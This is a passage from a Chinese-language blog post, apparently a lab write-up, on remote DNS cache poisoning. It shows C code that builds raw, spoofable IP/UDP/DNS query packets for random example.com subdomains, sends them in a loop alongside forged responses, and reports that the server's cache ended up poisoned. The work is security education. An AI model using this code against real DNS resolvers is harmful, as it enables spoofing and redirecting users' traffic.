class="keyword">struct</span> <span class="title">ipheader</span> *<span class="title">ip</span> =</span> (struct ipheader *) buffer;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">udpheader</span> *<span class="title">udp</span> =</span> (struct udpheader *) (buffer + <span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dnsheader</span> *<span class="title">dns</span>=</span>(struct dnsheader*) (buffer +<span class="keyword">sizeof</span>(struct ipheader)+<span class="keyword">sizeof</span>(struct udpheader));</span><br><span class="line"><span class="comment">// data is the pointer points to the first byte of the dns payload  </span></span><br><span class="line">    <span class="keyword">char</span> *data=(buffer +<span class="keyword">sizeof</span>(struct ipheader)+<span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader));</span><br><span class="line">    dns-&gt;flags=htons(FLAG_Q);</span><br><span class="line">    dns-&gt;QDCOUNT=htons(<span class="number">1</span>);</span><br><span class="line">    <span class="built_in">strcpy</span>(data,<span class="string">&quot;\5aaaaa\7example\3com&quot;</span>);</span><br><span class="line"> <span class="comment">//   strcpy(data,&quot;\3www\7example\3com&quot;);</span></span><br><span class="line">    <span class="keyword">int</span> length= <span class="built_in">strlen</span>(data)+<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//this is for convinience to get the struct type write the 4bytes in a more organized way.</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">dataEnd</span> * <span class="title">end</span>=</span>(struct dataEnd *)(data+length);</span><br><span class="line">    end-&gt;type=htons(<span class="number">1</span>);</span><br><span class="line">    end-&gt;<span class="class"><span class="keyword">class</span>=</span>htons(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_in</span> <span class="title">sin</span>, <span class="title">din</span>;</span></span><br><span class="line">    <span class="keyword">int</span> one = <span class="number">1</span>; 	<span class="keyword">const</span> <span class="keyword">int</span> *val = &amp;one;</span><br><span class="line">   dns-&gt;query_id=htons(rand()); <span class="comment">// transaction ID for the query packet, use random #</span></span><br><span class="line">    sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);</span><br><span class="line">	<span class="keyword">if</span>(sd&lt;<span class="number">0</span>) 	<span class="built_in">printf</span>(<span class="string">&quot;socket error\n&quot;</span>);</span><br><span class="line">    <span class="comment">// The source is redundant, may be used later if needed</span></span><br><span class="line"></span><br><span class="line">    din.sin_family = AF_INET;</span><br><span class="line">    din.sin_port = htons(<span class="number">53</span>);</span><br><span class="line">    din.sin_addr.s_addr = inet_addr(dstip); </span><br><span class="line">    ip-&gt;iph_ihl = <span class="number">5</span>; ip-&gt;iph_ver = <span class="number">4</span>; ip-&gt;iph_tos = <span class="number">0</span>; <span class="comment">// Low delay</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">short</span> <span class="keyword">int</span> packetLength =(<span class="keyword">sizeof</span>(struct ipheader) + <span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader)+length+<span class="keyword">sizeof</span>(struct dataEnd)); </span><br><span class="line">    ip-&gt;iph_len=htons(packetLength);</span><br><span class="line">    ip-&gt;iph_ident = htons(rand()); <span class="comment">// we give a random number for the identification#</span></span><br><span class="line">    ip-&gt;iph_ttl = <span class="number">110</span>; <span class="comment">// hops</span></span><br><span class="line">    ip-&gt;iph_protocol = <span class="number">17</span>; <span class="comment">// UDP</span></span><br><span class="line">    <span class="comment">// Source IP address, can use spoofed address here!!!</span></span><br><span class="line">    ip-&gt;iph_sourceip = inet_addr(srcip);	<span class="comment">//&quot;172.17.0.1&quot;-&gt;&quot;172.17.0.2&quot;</span></span><br><span class="line">    <span class="comment">// The destination IP address</span></span><br><span class="line">    ip-&gt;iph_destip = inet_addr(dstip);  <span class="comment">//&quot;172.17.0.2&quot;</span></span><br><span class="line">    <span class="comment">// Fabricate the UDP header. Source port number, redundant</span></span><br><span class="line"> <span class="comment">//   int t = 40000+rand()%10000;</span></span><br><span class="line"> <span class="comment">//   printf(&quot;t=%d\n&quot;,t);</span></span><br><span class="line">    udp-&gt;udph_srcport = htons(<span class="number">33333</span>); </span><br><span class="line">    <span class="comment">// Destination port number</span></span><br><span class="line">    udp-&gt;udph_destport = htons(<span class="number">53</span>);</span><br><span class="line">    udp-&gt;udph_len = htons(<span class="keyword">sizeof</span>(struct udpheader)+<span class="keyword">sizeof</span>(struct dnsheader)+length+<span class="keyword">sizeof</span>(struct dataEnd)); <span class="comment">// udp_header_size + udp_payload_size</span></span><br><span class="line">    <span class="comment">// Calculate the checksum for integrity//</span></span><br><span class="line">    ip-&gt;iph_chksum = csum((<span class="keyword">unsigned</span> <span class="keyword">short</span> *)buffer, <span class="keyword">sizeof</span>(struct ipheader) + <span class="keyword">sizeof</span>(struct udpheader));</span><br><span class="line">    udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-<span class="keyword">sizeof</span>(struct ipheader));</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">    <span class="keyword">if</span>(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, <span class="keyword">sizeof</span>(one))&lt;<span class="number">0</span> )</span><br><span class="line">    &#123;		<span class="built_in">printf</span>(<span class="string">&quot;error\n&quot;</span>);			<span class="built_in">exit</span>(<span class="number">-1</span>);	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">int</span> a = <span class="number">1</span>;</span><br><span class="line">	<span class="keyword">while</span>(a)&#123;	<span class="comment">// This is to generate different query in xxxxx.example.com 		</span></span><br><span class="line">		<span class="keyword">int</span> charnumber;</span><br><span class="line">		charnumber=<span class="number">1</span>+rand()%<span class="number">5</span>;</span><br><span class="line">		*(data+charnumber)+=<span class="number">1</span>;</span><br><span class="line">		udp-&gt;udph_chksum=check_udp_sum(buffer, packetLength-<span class="keyword">sizeof</span>(struct ipheader)); <span class="comment">// recalculate the checksum for the UDP packet</span></span><br><span class="line">		<span class="keyword">if</span>(sendto(sd, buffer, packetLength, <span class="number">0</span>, (struct sockaddr *)&amp;din, <span class="keyword">sizeof</span>(din)) &lt; <span class="number">0</span>)<span class="built_in">printf</span>(<span class="string">&quot;packet send error %d which means %s\n&quot;</span>,errno,strerror(errno));</span><br><span class="line">		<span class="comment">//sleep(0.9);</span></span><br><span class="line">		response(data,dstip,srcip);</span><br><span class="line">		response(data,dstip,srcip);</span><br><span class="line">		response(data,dstip,srcip);</span><br><span class="line">		response(data,dstip,srcip);</span><br><span class="line">	&#125; </span><br><span class="line">    close(sd);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译命令<code>sudo gcc -lpcap udp.c -o udp</code>，编译完成后执行<code>./udp</code>，等待一段时间。在此期间可以看到一直有查询和响应报文往来发送。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B8.png"></p>
<p>一段时间后停止程序运行，查看server的DNS缓存，如图所示，缓存已被毒化。</p>
<p><img src="/project/DNS%E6%94%BB%E5%87%BB/dns%E8%BF%9C%E7%A8%8B9.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/Imane219.github.io/tags/DNS/" rel="tag">DNS</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/Imane219.github.io/2021/04/19/TCP%E5%8D%8F%E8%AE%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" rel="prev" title="TCP协议漏洞利用">
      <i class="fa fa-chevron-left"></i> TCP协议漏洞利用
    </a></div>
      <div class="post-nav-item">
    <a href="/Imane219.github.io/2021/04/27/%E6%B4%9B%E8%B0%B7/" rel="next" title="洛谷">
      洛谷 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS%E6%9C%AC%E5%9C%B0%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">DNS本地攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS%E8%BF%9C%E7%A8%8B%E6%94%BB%E5%87%BB"><span class="nav-number">2.</span> <span class="nav-text">DNS远程攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E5%87%86%E5%A4%87%EF%BC%9A"><span class="nav-number">2.1.</span> <span class="nav-text">前置准备：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8BDNS%E7%BC%93%E5%AD%98%E4%B8%AD%E6%AF%92%E6%94%BB%E5%87%BB"><span class="nav-number">2.2.</span> <span class="nav-text">远程DNS缓存中毒攻击</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Imane</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/Imane219.github.io/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/Imane219.github.io/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/Imane219.github.io/tags/">
          
        <span class="site-state-item-count">28</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Imane</span>
</div>






        








      </div>
    </footer>
  </div>

  
  <script src="/Imane219.github.io/lib/anime.min.js"></script>
  <script src="/Imane219.github.io/lib/pjax/pjax.min.js"></script>
  <script src="/Imane219.github.io/lib/velocity/velocity.min.js"></script>
  <script src="/Imane219.github.io/lib/velocity/velocity.ui.min.js"></script>

<script src="/Imane219.github.io/js/utils.js"></script>

<script src="/Imane219.github.io/js/motion.js"></script>


<script src="/Imane219.github.io/js/schemes/muse.js"></script>


<script src="/Imane219.github.io/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  















    <div id="pjax">
  

  

  

    </div>


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
</body>
</html>
